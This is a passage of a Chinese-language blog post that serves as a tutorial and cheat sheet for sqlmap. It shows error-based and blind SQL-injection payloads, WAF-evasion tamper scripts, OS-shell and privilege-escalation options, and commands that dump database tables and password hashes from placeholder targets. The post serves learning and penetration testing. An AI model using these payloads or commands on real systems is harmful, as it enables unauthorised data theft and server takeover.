<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-icon-120x120.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"w01n.github.io","root":"/","scheme":"Pisces","version":"7.7.2","exturl":true,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":5,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Sqlmap使用的小小总结QAQ">
<meta property="og:type" content="article">
<meta property="og:title" content="SqlMap使用小记">
<meta property="og:url" content="https://w01n.github.io/2020/03/18/SqlMap%E4%BD%BF%E7%94%A8%E5%B0%8F%E8%AE%B0/index.html">
<meta property="og:site_name" content="oslo&#39;S Blog">
<meta property="og:description" content="Sqlmap使用的小小总结QAQ">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-03-18T05:51:24.000Z">
<meta property="article:modified_time" content="2020-03-18T05:51:24.000Z">
<meta property="article:author" content="Oslo">
<meta property="article:tag" content="SQLi">
<meta property="article:tag" content="SQLmap">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://w01n.github.io/2020/03/18/SqlMap%E4%BD%BF%E7%94%A8%E5%B0%8F%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true
  };
</script>

  <title>SqlMap使用小记 | oslo'S Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="oslo'S Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">oslo'S Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Self Recording</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签<span class="badge">4</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类<span class="badge">3</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档<span class="badge">3</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://w01n.github.io/2020/03/18/SqlMap%E4%BD%BF%E7%94%A8%E5%B0%8F%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Oslo">
      <meta itemprop="description" content="You guilty , You died">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="oslo'S Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SqlMap使用小记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-03-18 13:51:24" itemprop="dateCreated datePublished" datetime="2020-03-18T13:51:24+08:00">2020-03-18</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQLinjection/" itemprop="url" rel="index"><span itemprop="name">SQLinjection</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQLinjection/Tools/" itemprop="url" rel="index"><span itemprop="name">Tools</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>11k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>10 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Sqlmap使用的小小总结QAQ"><a href="#Sqlmap使用的小小总结QAQ" class="headerlink" title="Sqlmap使用的小小总结QAQ"></a>Sqlmap使用的小小总结QAQ</h1><a id="more"></a> 

<h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h2><p>最近在学习使用Sqlmap，看了很多文章，很多很杂，所以自己写一个小小的使用总结</p>
<p>如有不对请多多包涵 : -）</p>
<h2 id="先了解"><a href="#先了解" class="headerlink" title="先了解"></a>先了解</h2><p>SQLmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Acess，IBM DB2，SQLLite，Firebird，Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术，分别是盲推理SQL注入，UNION查询SQL注入，对查询和盲注。其广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。</p>
<p>当给Sqlmap一个url跑的时候，它会：</p>
<p>1.判断注入时选择的参数</p>
<p>2.判断识别出使用的那种数据库</p>
<p>3.判断注入时使用何种sql注入技术来进行注入</p>
<p>4.根据用户的选择需要，获取相应的需要的数据</p>
<h3 id="Sqlmap支持的五种sql注入："><a href="#Sqlmap支持的五种sql注入：" class="headerlink" title="Sqlmap支持的五种sql注入："></a>Sqlmap支持的五种sql注入：</h3><h4 id="1-基于报错的sql注入"><a href="#1-基于报错的sql注入" class="headerlink" title="1.基于报错的sql注入"></a>1.基于报错的sql注入</h4><h5 id="1）floor报错注入"><a href="#1）floor报错注入" class="headerlink" title="1）floor报错注入"></a>1）floor报错注入</h5><p>经典floor报错注入语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">（1）select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name from information_schema.tables group by name; </span><br><span class="line">（2）select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x</span><br></pre></td></tr></table></figure>

<h5 id="2）UpdateXml报错注入"><a href="#2）UpdateXml报错注入" class="headerlink" title="2）UpdateXml报错注入"></a>2）UpdateXml报错注入</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema&#x3D;database() limit 3,1)),0);</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &#39;~users&#39;</span><br></pre></td></tr></table></figure>

<p>获取字段名和内容的命令格式类似</p>
<h5 id="3）ExtractValue报错注入"><a href="#3）ExtractValue报错注入" class="headerlink" title="3）ExtractValue报错注入"></a>3）ExtractValue报错注入</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema&#x3D;database() limit 3,1)));</span><br><span class="line">ERROR 1105 (HY000): XPATH syntax error: &#39;\users&#39;</span><br></pre></td></tr></table></figure>

<h4 id="2-基于布尔的注入"><a href="#2-基于布尔的注入" class="headerlink" title="2.基于布尔的注入"></a>2.基于布尔的注入</h4><p>通过构造sql语句，通过判断语句是否执行成功来对数据进行猜解。</p>
<p>查看表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1;</span><br></pre></td></tr></table></figure>

<p>无论输入什么只有正确和错误的，那么就可以判断是基于布尔的注入</p>
<h4 id="3-基于时间的盲注"><a href="#3-基于时间的盲注" class="headerlink" title="3.基于时间的盲注"></a>3.基于时间的盲注</h4><p>基于的原理是，当对数据库进行查询操作，如果查询的条件不存在，语句执行的时间便是0.但往往语句执行的速度非常快，线程信息一闪而过，得到的执行时间基本为0。但是如果查询语句的条件不存在，执行的时间便是0，利用该函数这样一个特殊的性质，可以利用时间延迟来判断我们查询的是否存在。这便是SQL基于时间延迟的盲注的工作原理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select if(ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1)；</span><br></pre></td></tr></table></figure>

<p>与基于布尔注入相比，基于时间的盲注使用了if语句来进行判断</p>
<h4 id="4-联合查询注入（union-injection）"><a href="#4-联合查询注入（union-injection）" class="headerlink" title="4.联合查询注入（union injection）"></a>4.联合查询注入（union injection）</h4><p>联合查询注入的前提条件是页面上有显示为位，在可以使用union的情况下进行联合查询注入</p>
<p>联合注入的过程：</p>
<p>1、判断注入点</p>
<p>2、判断是整型还是字符型</p>
<p>3、判断查询列数</p>
<p>4、判断显示位</p>
<p>5、获取所有数据库名</p>
<p>6、获取数据库所有表名</p>
<p>7、获取字段名</p>
<p>8、获取字段中的数据</p>
<h4 id="5-堆查询注入（stack-injection）"><a href="#5-堆查询注入（stack-injection）" class="headerlink" title="5.堆查询注入（stack injection）"></a>5.堆查询注入（stack injection）</h4><p>堆查询注入也称为堆叠注入，通过添加一个新 的查询或者终止查询，可以达到修改数据和调用存储过程的目的，</p>
<p>可以同时执行多条语句的执行时的注入。</p>
<h2 id="安装Sqlmap"><a href="#安装Sqlmap" class="headerlink" title="安装Sqlmap"></a>安装Sqlmap</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;sqlmapproject&#x2F;sqlmap.git sqlmap-test</span><br></pre></td></tr></table></figure>

<h2 id="Sqlmap选项（Options"><a href="#Sqlmap选项（Options" class="headerlink" title="Sqlmap选项（Options)"></a>Sqlmap选项（Options)</h2><p>​    – version 显示程序的版本号并退出<br>​    - h, –help 显示此帮助消息并退出<br>​    - v VERBOSE 详细级别：0-6（默认为 1）</p>
<p>Target(目标)：<br>以下至少需要设置其中一个选项，设置目标 URL。<br>-d DIRECT 直接连接到数据库。<br>-u URL, –url=URL 目标 URL。<br>-l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。<br>-r REQUESTFILE 从一个文件中载入 HTTP 请求。<br>-g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。<br>-c CONFIGFILE 从 INI 配置文件中加载选项。</p>
<p>Request（请求）：:<br>这些选项可以用来指定如何连接到目标 URL。<br>–data=DATA 通过 POST 发送的数据字符串<br>–cookie=COOKIE HTTP Cookie 头<br>–cookie-urlencode URL 编码生成的 cookie 注入<br>–drop-set-cookie 忽略响应的 Set –Cookie 头信息<br>–user-agent=AGENT 指定 HTTP User –Agent 头<br>–random-agent 使用随机选定的 HTTP User-Agent 头<br>–referer=REFERER 指定 HTTP Referer 头<br>–headers=HEADERS 换行分开，加入其他的 HTTP 头<br>–auth-type=ATYPE HTTP 身份验证类型（基本，摘要或 NTLM）(Basic, Digest or NTLM)<br>–auth-cred=ACRED HTTP 身份验证凭据（用户名: 密码）<br>–auth-cert=ACERT HTTP 认证证书（key_file，cert_file）<br>–proxy=PROXY 使用 HTTP 代理连接到目标 URL<br>–proxy-cred=PCRED HTTP 代理身份验证凭据（用户名：密码）<br>–ignore-proxy 忽略系统默认的 HTTP 代理<br>–delay=DELAY 在每个 HTTP 请求之间的延迟时间，单位为秒<br>–timeout=TIMEOUT 等待连接超时的时间（默认为 30 秒）<br>–retries=RETRIES 连接超时后重新连接的时间（默认 3）<br>–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式<br>–safe-url=SAFURL 在测试过程中经常访问的 url 地址<br>–safe-freq=SAFREQ 两次访问之间测试请求，给出安全的 URL</p>
<p>Optimization（优化）：<br>这些选项可用于优化 sqlmap.py 的性能<br>-o 开启所有优化开关<br>–predict-output 预测常见的查询输出<br>–keep-alive 使用持久的 HTTP(S) 连接<br>–null-connection 从没有实际的 HTTP 响应体中检索页面长度<br>–threads=THREADS 最大的 HTTP(S) 请求并发量（默认为 1）</p>
<p>Injection（注入）：<br>这些选项可以用来指定测试哪些参数，提供自定义的注入 payloads 和可选篡改脚本。<br>-p TESTPARAMETER 可测试的参数<br>–dbms=DBMS 强制后端的 DBMS 为此值<br>–os=OS 强制后端的 DBMS 操作系统为这个值<br>–prefix=PREFIX 注入 payload 字符串前缀<br>–suffix=SUFFIX 注入 payload 字符串后缀<br>–tamper=TAMPER 使用给定的脚本篡改注入数据<br>–tamper 通过编码绕过 WEB 防火墙（WAF）sqlmap.py 默认用 char()<br>–tamper 插件所在目录 \ sqlmap-dev\tamper</p>
<ol>
<li>apostrophemask.py 用 UTF-8 全角字符替换单引号字符</li>
<li>apostrophenullencode.py 用非法双字节 unicode 字符替换单引号字符</li>
<li>appendnullbyte.py 在 payload 末尾添加空字符编码</li>
<li>base64encode.py 对给定的 payload 全部字符使用 Base64 编码</li>
<li>between.py 分别用 “NOT BETWEEN 0 AND #” 替换大于号 “&gt;”，“BETWEEN # AND #” 替换等于号“=”</li>
<li>bluecoat.py 在 SQL 语句之后用有效的随机空白符替换空格符，随后用 “LIKE” 替换等于号“=”</li>
<li>chardoubleencode.py 对给定的 payload 全部字符使用双重 URL 编码（不处理已经编码的字符）</li>
<li>charencode.py 对给定的 payload 全部字符使用 URL 编码（不处理已经编码的字符）</li>
<li>charunicodeencode.py 对给定的 payload 的非编码字符使用 Unicode URL 编码（不处理已经编码的字符）</li>
<li>concat2concatws.py 用 “CONCAT_WS(MID(CHAR(0), 0, 0), A, B)” 替换像 “CONCAT(A, B)” 的实例</li>
<li>equaltolike.py 用 “LIKE” 运算符替换全部等于号“=”</li>
<li>greatest.py 用 “GREATEST” 函数替换大于号“&gt;”</li>
<li>halfversionedmorekeywords.py 在每个关键字之前添加 MySQL 注释</li>
<li>ifnull2ifisnull.py 用 “IF(ISNULL(A), B, A)” 替换像 “IFNULL(A, B)” 的实例</li>
<li>lowercase.py 用小写值替换每个关键字字符</li>
<li>modsecurityversioned.py 用注释包围完整的查询</li>
<li>modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询</li>
<li>multiplespaces.py 在 SQL 关键字周围添加多个空格</li>
<li>nonrecursivereplacement.py 用 representations 替换预定义 SQL 关键字，适用于过滤器</li>
<li>overlongutf8.py 转换给定的 payload 当中的所有字符</li>
<li>percentage.py 在每个字符之前添加一个百分号</li>
<li>randomcase.py 随机转换每个关键字字符的大小写</li>
<li>randomcomments.py 向 SQL 关键字中插入随机注释</li>
<li>securesphere.py 添加经过特殊构造的字符串</li>
<li>sp_password.py 向 payload 末尾添加 “sp_password” for automatic obfuscation from DBMS logs</li>
<li>space2comment.py 用 “/**/” 替换空格符</li>
<li>space2dash.py 用破折号注释符 “–” 其次是一个随机字符串和一个换行符替换空格符</li>
<li>space2hash.py 用磅注释符 “#” 其次是一个随机字符串和一个换行符替换空格符</li>
<li>space2morehash.py 用磅注释符 “#” 其次是一个随机字符串和一个换行符替换空格符</li>
<li>space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符</li>
<li>space2mssqlhash.py 用磅注释符 “#” 其次是一个换行符替换空格符</li>
<li>space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符</li>
<li>space2mysqldash.py 用破折号注释符 “–” 其次是一个换行符替换空格符</li>
<li>space2plus.py 用加号 “+” 替换空格符</li>
<li>space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符</li>
<li>unionalltounion.py 用 “UNION SELECT” 替换“UNION ALL SELECT”</li>
<li>unmagicquotes.py 用一个多字节组合 %bf%27 和末尾通用注释一起替换空格符</li>
<li>varnish.py 添加一个 HTTP 头 “X-originating-IP” 来绕过 WAF</li>
<li>versionedkeywords.py 用 MySQL 注释包围每个非函数关键字</li>
<li>versionedmorekeywords.py 用 MySQL 注释包围每个关键字</li>
<li>xforwardedfor.py 添加一个伪造的 HTTP 头 “X-Forwarded-For” 来绕过 WAF</li>
</ol>
<p>Detection（检测）：<br>这些选项可以用来指定在 SQL 盲注时如何解析和比较 HTTP 响应页面的内容<br>–level=LEVEL 执行测试的等级（1-5，默认为 1）<br>–risk=RISK 执行测试的风险（0-3，默认为 1）<br>–string=STRING 查询有效时在页面匹配字符串<br>–regexp=REGEXP 查询有效时在页面匹配正则表达式<br>–text-only 仅基于文本内容比较网页</p>
<p>这些选项可用于调整具体的 SQL 注入测试<br>–technique=TECH SQL 注入技术测试（默认 BEUST）<br>Techniques（技巧）：<br>–technique /* 测试指定注入类型 \ 使用的技术<br>不加参数默认测试所有注入技术：<br>B: 基于布尔的 SQL 盲注<br>E: 基于显错 sql 注入<br>U: 基于 UNION 注入<br>S: 叠层 sql 注入<br>T: 基于时间盲注</p>
<p>–time-sec=TIMESEC DBMS 响应的延迟时间（默认为 5 秒）<br>–union-cols=UCOLS 定列范围用于测试 UNION 查询注入<br>–union-char=UCHAR 用于暴力猜解列数的字符</p>
<p>Fingerprint（指纹）：<br>-f, –fingerprint 执行检查广泛的 DBMS 版本指纹</p>
<p>Enumeration（枚举）：<br>这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行您自己的 SQL 语句<br>-b, –banner 检索数据库管理系统的标识<br>–current-user 检索数据库管理系统当前用户<br>–current-db 检索数据库管理系统当前数据库<br>–is-dba 检测 DBMS 当前用户是否 DBA<br>–users 枚举数据库管理系统用户<br>–passwords 枚举数据库管理系统用户密码哈希<br>–privileges 枚举数据库管理系统用户的权限<br>–roles 枚举数据库管理系统用户的角色<br>–dbs 枚举数据库管理系统数据库<br>–tables 枚举 DBMS 数据库中的表<br>–columns 枚举 DBMS 数据库表列<br>–dump 转储数据库管理系统的数据库中的表项<br>–dump-all 转储所有的 DBMS 数据库表中的条目<br>–search 搜索列，表和 / 或数据库名称<br>-D DB 要进行枚举的数据库名<br>-T TBL 要进行枚举的数据库表<br>-C COL 要进行枚举的数据库列<br>-U USER 用来进行枚举的数据库用户<br>–exclude-sysdbs 枚举表时排除系统数据库<br>–start=LIMITSTART 第一个查询输出进入检索<br>–stop=LIMITSTOP 最后查询的输出进入检索<br>–first=FIRSTCHAR 第一个查询输出字的字符检索<br>–last=LASTCHAR 最后查询的输出字字符检索<br>–sql-query=QUERY 要执行的 SQL 语句<br>–sql-shell 提示交互式 SQL 的 shell</p>
<p>Brute force(蛮力):<br>这些选项可以被用来运行蛮力检查。<br>–common-tables 检查存在共同表<br>–common-columns 检查存在共同列</p>
<p>User-defined function injection（用户自定义函数注入）：<br>这些选项可以用来创建用户自定义函数。<br>–udf-inject 注入用户自定义函数<br>–shared-lib=SHLIB 共享库的本地路径</p>
<p>File system access（访问文件系统）：<br>这些选项可以被用来访问后端数据库管理系统的底层文件系统。<br>–file-read=RFILE 从后端的数据库管理系统文件系统读取文件<br>–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件<br>–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径</p>
<p>Operating system access（操作系统访问）：<br>这些选项可以用于访问后端数据库管理系统的底层操作系统。<br>–os-cmd=OSCMD 执行操作系统命令<br>–os-shell 交互式的操作系统的 shell<br>–os-pwn 获取一个 OOB shell，meterpreter 或 VNC<br>–os-smbrelay 一键获取一个 OOB shell，meterpreter 或 VNC<br>–os-bof 存储过程缓冲区溢出利用<br>–priv-esc 数据库进程用户权限提升<br>–msf-path=MSFPATH Metasploit Framework 本地的安装路径<br>–tmp-path=TMPPATH 远程临时文件目录的绝对路径</p>
<p>Windows 注册表访问：<br>这些选项可以被用来访问后端数据库管理系统 Windows 注册表。<br>–reg-read 读一个 Windows 注册表项值<br>–reg-add 写一个 Windows 注册表项值数据<br>–reg-del 删除 Windows 注册表键值<br>–reg-key=REGKEY Windows 注册表键<br>–reg-value=REGVAL Windows 注册表项值<br>–reg-data=REGDATA Windows 注册表键值数据<br>–reg-type=REGTYPE Windows 注册表项值类型</p>
<p>General（一般）：<br>这些选项可以用来设置一些一般的工作参数。<br>-t TRAFFICFILE 记录所有 HTTP 流量到一个文本文件中<br>-s SESSIONFILE 保存和恢复检索会话文件的所有数据<br>–flush-session 刷新当前目标的会话文件<br>–fresh-queries 忽略在会话文件中存储的查询结果<br>–eta 显示每个输出的预计到达时间<br>–update 更新 SqlMap<br>–save file 保存选项到 INI 配置文件<br>–batch 从不询问用户输入，使用所有默认配置。</p>
<p>Miscellaneous（杂项）：<br>–beep 发现 SQL 注入时提醒<br>–check-payload IDS 对注入 payloads 的检测测试<br>–cleanup sqlmap.py 具体的 UDF 和表清理 DBMS<br>–forms 对目标 URL 的解析和测试形式<br>–gpage=GOOGLEPAGE 从指定的页码使用谷歌 dork 结果<br>–page-rank Google dork 结果显示网页排名（PR）<br>–parse-errors 从响应页面解析数据库管理系统的错误消息<br>–replicate 复制转储的数据到一个 sqlite3 数据库<br>–tor 使用默认的 Tor（Vidalia/ Privoxy/ Polipo）代理地址<br>–wizard 给初级用户的简单向导界面</p>
<h2 id="Sqlmap基础的使用"><a href="#Sqlmap基础的使用" class="headerlink" title="Sqlmap基础的使用"></a>Sqlmap基础的使用</h2><p>./sqlmap.py sqlmap -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> // 查是否有注入，一些基本信息</p>
<p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –dbs // 枚举数据库</p>
<p>./sqlmap.py sqlmap -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –tables // 表名枚举</p>
<p>./sqlmap.py sqlmap -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –columns -T 数据库表名 // 字段枚举</p>
<p>./sqlmap.py sqlmap -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –dump -T 数据库表名 -C “字段 1，字段 2，字段 3” //dump</p>
<p>./sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3d3dy54eHguY29t" title="http://www.xxx.com">http://www.xxx.com”<i class="fa fa-external-link"></i></span> –dump -D 数据库名 -T 表名 -C “字段名 1，字段名 2，字段名 3” //dump</p>
<p>获取数据库—&gt; 获取表名—-&gt; 获取字段名—-&gt; 获取数据库内容</p>
<h2 id="Sqlmap初级使用"><a href="#Sqlmap初级使用" class="headerlink" title="Sqlmap初级使用"></a>Sqlmap初级使用</h2><p>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dbs / <em>查询是什么数据库sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –current-db /</em> 获取当前数据库名称<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –current-user / <em>获取当前用户名称sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> -D DataName –tables /</em> 获取 DataName 数据库的表<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –columns -T “tablename” users-D “db_name” -v 0 /* 列字段</p>
<p>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> -D DataName –T TableNamen –C “admin,password” –dump -v 0 / <em>获取字段数据sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dbms “Mysql” /</em> 指定数据库类型<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –users / <em>列数据库用户sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –passwords /</em> 获取数据库用户密码<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –passwords -U root -v 0 / <em>列出指定用户数据库密码sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dump -C “password,user,id” -T “tablename” -D “db_name” –start 1 –stop 20 /</em> 列出指定字段，列出 20 条<br>sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –dump-all -v 0 / <em>列出所有数据库所有表sqlmap.py -u “<span class="exturl" data-url="aHR0cDovL3VybC9uZXdzP2lkPTHigJ0=" title="http://url/news?id=1”">http://url/news?id=1”<i class="fa fa-external-link"></i></span> –privileges /</em> 查看权限<br>sqlmap.py -u “<span 